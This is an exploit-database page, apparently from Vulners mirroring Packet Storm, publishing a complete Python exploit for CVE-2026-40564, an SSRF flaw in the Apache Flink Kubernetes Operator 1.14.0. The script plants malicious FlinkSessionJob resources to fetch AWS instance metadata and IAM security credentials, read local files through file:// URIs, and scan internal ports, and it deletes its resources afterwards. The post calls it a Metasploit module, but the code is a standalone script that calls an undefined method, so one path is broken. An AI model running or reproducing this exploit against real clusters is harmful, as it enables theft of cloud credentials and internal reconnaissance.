Lucene search
K

📄 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery

🗓️ 16 Jun 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 9 Views

This ia proof of concept Metasploit module for the Apache Flink Kubernetes Operator version 1.14.0 server-side request forgery vulnerability that also provides metadata extraction.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-40564
29 May 202609:32
githubexploit
ATTACKERKB
CVE-2026-40564
26 May 202614:38
attackerkb
Circl
CVE-2026-40564
26 May 202615:20
circl
CNNVD
Apache Flink Kubernetes Operator 安全漏洞
26 May 202600:00
cnnvd
CVE
CVE-2026-40564
26 May 202614:38
cve
Cvelist
CVE-2026-40564 Apache Flink Kubernetes Operator: Server-Side Request Forgery and local file access in Kubernetes Operator
26 May 202614:38
cvelist
EUVD
EUVD-2026-31846
26 May 202614:38
euvd
NVD
CVE-2026-40564
26 May 202616:16
nvd
Packet Storm
📄 Apache Flink Kubernetes Operator 1.14.0 Server-Side Request Forgery
16 Jun 202600:00
packetstorm
Positive Technologies
PT-2026-43265
26 May 202600:00
ptsecurity
Rows per page
==================================================================================================================================
    | # Title     : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploitation Tool with Metadata Extraction                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://flink.apache.org/                                                                                        |
    ==================================================================================================================================
    
    [+] Summary    :  This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import json
    import sys
    import time
    import urllib.request
    import urllib.parse
    import ssl
    import re
    from typing import Optional, Dict, List, Tuple
    
    class FlinkOperatorSSRF:
        def __init__(self, api_server: str, token: str = None, namespace: str = "default", 
                     verify_ssl: bool = False, timeout: int = 30):
            self.api_server = api_server.rstrip('/')
            self.namespace = namespace
            self.timeout = timeout
            self.verify_ssl = verify_ssl
            self.headers = {
                'Content-Type': 'application/json'
            }
            
            if token:
                self.headers['Authorization'] = f'Bearer {token}'
    
            self.ctx = ssl.create_default_context()
            if not verify_ssl:
                self.ctx.check_hostname = False
                self.ctx.verify_mode = ssl.CERT_NONE
        
        def log(self, msg: str, level: str = "INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m",
                "PROC": "\033[94m[@]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def k8s_request(self, method: str, path: str, data: dict = None) -> Tuple[Optional[int], Optional[dict]]:
            """Make Kubernetes API request"""
            url = f"{self.api_server}{path}"
            req = urllib.request.Request(url, method=method, headers=self.headers)
            
            if data:
                req.add_header('Content-Type', 'application/json')
                req.data = json.dumps(data).encode('utf-8')
            
            try:
                with urllib.request.urlopen(req, context=self.ctx, timeout=self.timeout) as resp:
                    body = resp.read().decode('utf-8')
                    if body:
                        return resp.status, json.loads(body)
                    return resp.status, None
            except urllib.error.HTTPError as e:
                if e.code == 409:  # Conflict - resource may already exist
                    return e.code, None
                body = e.read().decode('utf-8') if e.fp else ''
                self.log(f"K8s API error: {e.code} - {body[:200]}", "WARNING")
                return e.code, None
            except Exception as e:
                self.log(f"Request failed: {e}", "ERROR")
                return None, None
        
        def find_operator_pod(self) -> Optional[str]:
            """Find Flink operator pod in the cluster"""
            self.log("Searching for Flink operator pod...", "PROC")
            
            status, pods = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods')
            
            if status == 200 and pods:
                for pod in pods.get('items', []):
                    name = pod.get('metadata', {}).get('name', '')
                    if 'flink-kubernetes-operator' in name.lower():
                        self.log(f"Found operator pod: {name}", "SUCCESS")
                        return name
            
            self.log("Could not find operator pod", "WARNING")
            return None
        
        def get_operator_logs(self, pod_name: str, tail_lines: int = 100) -> Optional[str]:
            """Fetch operator pod logs"""
            status, logs = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods/{pod_name}/log?tailLines={tail_lines}')
            
            if status == 200:
                return logs if isinstance(logs, str) else str(logs)
            
            return None
        
        def create_flink_session_job(self, name: str, jar_uri: str) -> bool:
            """Create malicious FlinkSessionJob"""
            manifest = {
                "apiVersion": "flink.apache.org/v1beta1",
                "kind": "FlinkSessionJob",
                "metadata": {
                    "name": name,
                    "namespace": self.namespace
                },
                "spec": {
                    "job": {
                        "jarURI": jar_uri,
                        "parallelism": 1,
                        "upgradeMode": "stateless"
                    },
                    "flinkConfiguration": {},
                    "jobManager": {},
                    "taskManager": {}
                }
            }
            
            status, _ = self.k8s_request(
                'POST',
                f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/flinksessionjobs',
                manifest
            )
            
            if status == 201:
                self.log(f"Created FlinkSessionJob: {name}", "SUCCESS")
                return True
            
            self.log(f"Failed to create FlinkSessionJob: HTTP {status}", "ERROR")
            return False
        
        def delete_resource(self, name: str, resource_type: str = 'flinksessionjob') -> bool:
            """Delete Kubernetes resource"""
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, _ = self.k8s_request('DELETE', path)
            
            if status in [200, 202, 204]:
                self.log(f"Deleted {resource_type}: {name}", "SUCCESS")
                return True
            
            return False
        
        def get_resource_status(self, name: str, resource_type: str = 'flinksessionjob') -> Optional[dict]:
            """Get resource status"""
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, data = self.k8s_request('GET', path)
            
            if status == 200:
                return data
            
            return None
        
        def check_ssrf(self, jar_uri: str, use_session_cluster: bool = True) -> bool:
            """Execute SSRF attack"""
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            resource_name = f"ssrf-{int(time.time())}"
            
            self.log(f"Creating SSRF resource: {resource_name}", "PROC")
            self.log(f"Target URL: {jar_uri}")
    
            if use_session_cluster:
                success = self.create_flink_session_job(resource_name, jar_uri)
            else:
                success = self.create_flink_deployment(resource_name, jar_uri)
            
            if not success:
                return False
            self.log("Waiting for operator reconciliation (15s)...", "PROC")
            time.sleep(15)
            status = self.get_resource_status(resource_name, resource_type)
            
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                self.log(f"Resource status: {status_text[:200]}...")
                error_keywords = [
                    'Failed to fetch',
                    'Connection refused',
                    'connect timed out',
                    'UnknownHostException',
                    'FileNotFoundException'
                ]
                
                for keyword in error_keywords:
                    if keyword in status_text:
                        self.log(f"SSRF attempt confirmed: {keyword}", "SUCCESS")
                        break
            operator_pod = self.find_operator_pod()
            if operator_pod:
                self.log("Fetching operator logs...", "PROC")
                logs = self.get_operator_logs(operator_pod, 200)
                
                if logs and jar_uri in logs:
                    self.log(f"SSRF CONFIRMED - operator fetched {jar_uri}", "SUCCESS")
    
                    if 'GET' in logs and jar_uri in logs:
                        self.log("HTTP GET request confirmed in logs", "SUCCESS")
                    ua_match = re.search(r'User-Agent: ([^\n]+)', logs)
                    if ua_match:
                        self.log(f"User-Agent: {ua_match.group(1)}")
            self.log("Cleaning up resources...", "PROC")
            self.delete_resource(resource_name, resource_type)
            
            return True
        
        def read_aws_metadata(self, use_session_cluster: bool = True) -> Optional[dict]:
            """Attempt to read AWS instance metadata"""
            self.log("Attempting to read AWS metadata via SSRF...", "PROC")
            
            metadata_urls = [
                "http://169.254.169.254/latest/meta-data/",
                "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                "http://169.254.169.254/latest/user-data/",
                "http://169.254.169.254/latest/dynamic/instance-identity/document"
            ]
            results = {}
            for url in metadata_urls:
                self.log(f"Trying: {url}")
                resource_name = f"ssrf-metadata-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    self.create_flink_deployment(resource_name, url)
                time.sleep(10)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
    
                    if 'iam' in status_text.lower() or 'security-credentials' in status_text.lower():
                        self.log(f"Metadata found at {url}!", "SUCCESS")
                        roles = re.findall(r'([a-zA-Z0-9\-_]+)', status_text)
                        results[url] = status_text
                        
                        for role in roles:
                            if len(role) > 3 and not role.isdigit():
                                self.log(f"  Role: {role}")
                self.delete_resource(resource_name, resource_type)
                time.sleep(1)
            return results if results else None
        def read_local_file(self, filepath: str, use_session_cluster: bool = True) -> Optional[str]:
            """Attempt to read local file via file:// scheme"""
            self.log(f"Attempting to read file: {filepath}", "PROC")
            jar_uri = f"file://{filepath}"
            resource_name = f"ssrf-file-{int(time.time())}"
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            if use_session_cluster:
                self.create_flink_session_job(resource_name, jar_uri)
            else:
                self.create_flink_deployment(resource_name, jar_uri)
            time.sleep(10)
            status = self.get_resource_status(resource_name, resource_type)
            content = None
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                if 'file://' in status_text:
                    file_content = re.search(r'Message: (.+?)(?:\"|$)', status_text)
                    if file_content:
                        content = file_content.group(1)
                        self.log(f"File content extracted:", "SUCCESS")
                        print("\n" + "=" * 65)
                        print(content)
                        print("=" * 65)
            
            self.delete_resource(resource_name, resource_type)
            return content
        
        def internal_port_scan(self, host: str, ports: List[int], use_session_cluster: bool = True) -> List[int]:
            """Scan internal ports via SSRF"""
            self.log(f"Scanning {host} ports: {ports}", "PROC")
            
            open_ports = []
            
            for port in ports:
                url = f"http://{host}:{port}/"
                self.log(f"Testing port {port}...")
                
                resource_name = f"ssrf-scan-{port}-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    self.create_flink_deployment(resource_name, url)
                time.sleep(5)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
                    
                    if 'Connection refused' in status_text:
                        self.log(f"Port {port}: closed")
                    elif 'connect timed out' in status_text:
                        self.log(f"Port {port}: timeout (maybe filtered)")
                    elif 'Failed to fetch' not in status_text:
                        self.log(f"Port {port}: OPEN or responding", "SUCCESS")
                        open_ports.append(port)
                
                self.delete_resource(resource_name, resource_type)
            return open_ports
        def run(self, ssrf_url: str = None, use_session_cluster: bool = True, 
                read_metadata: bool = False, read_file: str = None,
                scan_host: str = None, scan_ports: List[int] = None) -> bool:
            """Main exploit routine"""
            self.log(f"Target: {self.api_server}")
            self.log(f"Namespace: {self.namespace}")
            status, _ = self.k8s_request('GET', '/version')
            if status != 200:
                self.log("Cannot connect to Kubernetes API", "ERROR")
                return False
            self.log("Connected to Kubernetes API", "SUCCESS")
            if read_metadata:
                metadata = self.read_aws_metadata(use_session_cluster)
                if metadata:
                    self.log("AWS metadata extraction complete", "SUCCESS")
                    return True
            elif read_file:
                content = self.read_local_file(read_file, use_session_cluster)
                if content:
                    return True
            elif scan_host and scan_ports:
                open_ports = self.internal_port_scan(scan_host, scan_ports, use_session_cluster)
                if open_ports:
                    self.log(f"Open ports: {open_ports}", "SUCCESS")
                return bool(open_ports)
            elif ssrf_url:
                return self.check_ssrf(ssrf_url, use_session_cluster)
            else:
                self.log("No action specified", "ERROR")
                return False
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF"
        )
        parser.add_argument("--api-server", required=True, help="Kubernetes API server URL")
        parser.add_argument("--token", help="Bearer token for authentication")
        parser.add_argument("--namespace", default="default", help="Kubernetes namespace")
        parser.add_argument("--insecure", action="store_true", help="Skip SSL verification")
        parser.add_argument("--ssrf-url", help="URL to fetch via SSRF")
        parser.add_argument("--read-aws-metadata", action="store_true", help="Read AWS instance metadata")
        parser.add_argument("--read-file", help="Read local file via file:// scheme")
        parser.add_argument("--scan-host", help="Host to scan for open ports")
        parser.add_argument("--scan-ports", help="Comma-separated ports to scan (e.g., 80,443,8080)")
        parser.add_argument("--use-deployment", action="store_true", help="Use FlinkDeployment instead of FlinkSessionJob")
        parser.add_argument("--timeout", type=int, default=30, help="Request timeout")
        
        args = parser.parse_args()
        
        print("""
    ╔══════════════════════════════════════════════════════════════════╗
    ║  CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF        ║
    ║  Server-Side Request Forgery via jarURI                        ║
    ╚══════════════════════════════════════════════════════════════════╝
        """)
        
        exploit = FlinkOperatorSSRF(
            api_server=args.api_server,
            token=args.token,
            namespace=args.namespace,
            verify_ssl=not args.insecure,
            timeout=args.timeout
        )
        
        scan_ports = None
        if args.scan_ports:
            scan_ports = [int(p.strip()) for p in args.scan_ports.split(',')]
        
        success = exploit.run(
            ssrf_url=args.ssrf_url,
            use_session_cluster=not args.use_deployment,
            read_metadata=args.read_aws_metadata,
            read_file=args.read_file,
            scan_host=args.scan_host,
            scan_ports=scan_ports
        )
        
        sys.exit(0 if success else 1)
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jun 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.16.5
EPSS0.00312
SSVC
9